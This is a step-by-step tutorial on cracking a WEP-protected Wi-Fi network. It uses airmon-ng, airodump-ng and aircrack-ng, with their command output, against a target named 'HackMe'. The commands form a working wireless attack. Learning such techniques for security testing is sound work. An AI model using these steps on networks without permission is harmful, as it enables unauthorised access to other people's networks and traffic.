Cracking WEP
Make sure you've completed the initial setup before continuing to use the commands on the rest of this page.
Some commands require root to run. If using Kali, you don't need to worry as you're running as root anyway, if not it might be worth elevating to root on your system.
Enable Monitor Mode
You need to enable monitor mode on your wireless interface in order for it to send and receive the packets required for the rest of the attack.
See what devices you have on your system with:
# airmon-ng
PHY Interface Driver Chipset
phy0 wlo1 iwlwifi Intel Corporation Wireless 7260 (rev 73)
Our WiFi card has is the wlo1 interface. So now we need to enable monitor mode on this interface.
# airmon-ng start wlo1
PHY Interface Driver Chipset
phy0 wlo1 iwlwifi Intel Corporation Wireless 7260 (rev 73)
(mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
(mac80211 station mode vif disabled for [phy0]wlo1)
You might get a warning message saying Found 5 processes that could cause trouble. everything should probably be okay and work fine anyway.
Now if you list the interfaces again:
# airmon-ng
PHY Interface Driver Chipset
phy0 wlo1mon iwlwifi Intel Corporation Wireless 7260 (rev 73)
Notice how the interface name has changed from wlo1 to wlo1mon.
Now we're ready to start investigating our target WiFi network.
Scan Surrounding Networks
After we've setup our WiFi interface, we need to scan for our target WiFi network to determine it's ESSID and the channel it's broadcasting on.
Start the following command and it will start looking for available networks and retrieve information about them. Once you've seen your target network show up you can stop the scanning with Ctrl-c. In this snippet, irrelevant data has been cut out and replaced with [...]. You will likely see quite a few networks here.
# airodump-ng wlo1mon
CH X ][ Elapsed: 0 s ][ 2017-01-01 00:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
[...]
00:18:4D:67:1C:84 -38 5 0 0 11 54 . WEP WEP HackMe
[...]
BSSID STATION PWR Rate Lost Frames Probe
[...]
From this, what we're interested in is the BSSID, CH, CIPHER andESSID columns.
The BSSID and ESSID values identify our target network, in this guide, we'll be using the ESSID value but we could change the parameters to use the BSSID if we wanted.
The CH value is the radio channel the target network is broadcasting on. We'll need this later when performing our attack.
The CIPHER value is the cipher used by the network to protect access and traffic. For this guide the cipher needs to be WEP as we're focusing on attacking WEP networks.
Capturing Data
Now we know all the data we need to perform our attack on the network. In order for this to work, some data needs to be in transmission over the network, so if no one is connected this won't work. In most cases though someone will be connected and transmitting some kind of data.
We need to sniff the traffic going across the network and save it to a file so we can then crack the WEP key later using aircrack-ng. You need to capture a reasonable amount of data for this to work. Leave it to capture until the #Data value is above around 64k. You can probably get away with less data, but if the next step doesn't work come back to this step and leave it for a little longer.
# airodump-ng wlo1mon --ivs --channel 11 --essid HackMe -w wep-cracking
CH 11 ][ Elapsed: 32 s ][ 2017-01-01 00:00
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:4D:67:1C:84 -41 100 390 99003 2756 11 54 . WEP WEP HackMe
BSSID STATION PWR Rate Lost Frames Probe
[...]
This starts dumping data to the file wep-cracking-01.ivs.
Cracking the Key
We now have all we need to crack the WEP key from our data file.
# aircrack-ng -e HackMe wep-cracking-01.ivs
Opening wep-cracking-01.ivs
Read 99355 packets.
Opening wep-cracking-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 99354 ivs.
KEY FOUND! [ 00:00:00:00:00 ] (ASCII: ..... )
Decrypted correctly: 100%
And there it is, our WEP key! 00:00:00:00:00 - simple right?